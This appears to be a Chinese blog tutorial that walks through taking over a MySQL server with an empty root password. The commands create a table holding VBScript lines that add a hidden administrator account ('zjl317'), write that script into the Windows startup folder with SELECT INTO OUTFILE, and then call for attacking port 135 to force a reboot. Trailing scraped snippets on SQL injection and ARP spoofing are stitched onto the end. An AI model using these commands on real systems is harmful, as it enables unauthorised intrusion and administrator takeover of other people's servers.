mysql
使用者root密碼為空時是乙個很大的漏洞,在網上也有許多一些利用此漏洞的方法,一般就是寫乙個asp或
php
的後門,不僅很麻煩,而且還要猜解**的目錄,如果對方沒有開iis,那我們豈不沒辦法了??
後來,自己思索想到乙個辦法,且在測試的幾台有此漏洞的機中均獲得了成功,現將攻擊方法公布如下:
1、連線到對方mysql 伺服器
mysql -u root -h 192.168.0.1
mysql.exe 這個程式在你安裝了mysql的的bin目錄中
2、讓我們來看看伺服器中有些什麼資料庫
mysql>show databases;
mysql預設安裝時會有mysql、test這兩個資料庫,如果你看到有其它的資料庫那麼就是使用者自建的資料庫。
3、讓我們進入資料庫
mysql>use test;
我們將會進入test資料庫中
4、檢視我們進入資料庫中有些什麼資料表
mysql>show tables;
預設的情況下,test中沒有任何表的存在。
以下為關鍵的部分
5、在test資料庫下建立乙個新的表;
mysql>create table a (cmd text);
好了,我們建立了乙個新的表,表名為a,表中只存放乙個字段,欄位名為cmd,為text文字。
6、在表中插入內容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );
mysql>insert into a values ("b=wshshell.run
(""cmd.exe /c net localgroup administrators zjl317 /add"",0) " );
注意雙引號和括號以及後面的「0」一定要輸入!我們將用這三條命令來建立乙個vbs的指令碼程式!
7、好了,現在我們來看看表a中有些什麼
mysql>select * from a;
我們將會看到表中有三行資料,就是我們剛剛輸入的內容,確認你輸入的內容無誤後,我們來到下一步
8、輸出表為乙個vbs的指令碼檔案
mysql>select * from a into outfile "c:\\\\docume~1\\\\alluse~1\\\\「開始」選單\\\\程式\\\\啟動\\\\a.vbs";
我們把我們表中的內容輸入到啟動組中,是乙個vbs的指令碼檔案!注意「\\"符號。
9、看到這大家肯定知道了,就是利用mysql輸出乙個可執行的檔案而已。為什麼不用bat呢,因為啟動執行時會有明顯的dos視窗出來,而用vbs指令碼則可以完全隱藏視窗且不會有錯誤提示!本來,應該還有一句完成指令碼後自動刪除此指令碼的,但是中文目錄實在無法處理,只有作罷!好了,找個工具攻擊135讓伺服器重啟吧,幾分鐘以後你就是管理員了。
防止入侵 My SQL各種攻擊方法大全
mysql 使用者root密碼為空時是乙個很大的漏洞,在網上也有許多一些利用此漏洞的方法,一般就是寫乙個asp或 php 的後門,不僅很麻煩,而且還要猜解 的目錄,如果對方沒有開iis,那我們豈不沒辦法了?後來,自己思索想到乙個辦法,且在測試的幾台有此漏洞的機中均獲得了成功,現將攻擊方法公布如下 1...
防止sql注入攻擊的方法總結
sql注入是一種利用未過濾 未審核使用者輸入的攻擊方法 快取溢位 和這個不同 意思就是讓應用執行本不應該執行的sql 通過把sql命令插入到web表單遞交或輸入網域名稱或頁面請求的查詢字串,就會造成一些出人意料的結果,最終達到欺騙伺服器執行惡意的sql命令。sql注入是比較常見的網路攻擊方式之一,它...
防止同網段ARP欺騙攻擊的配置方法
防止同網段arp欺騙攻擊的配置方法 二層交換機實現仿冒閘道器的arp防攻擊 一 組網需求 1.二層交換機阻止網路使用者仿冒閘道器ip的 arp攻擊 二 組網圖 圖1二層交換機防 arp攻擊組網 s3552p 是三層裝置,其中ip 100.1.1.1 是所有pc 的閘道器,s3552p 上的閘道器 m...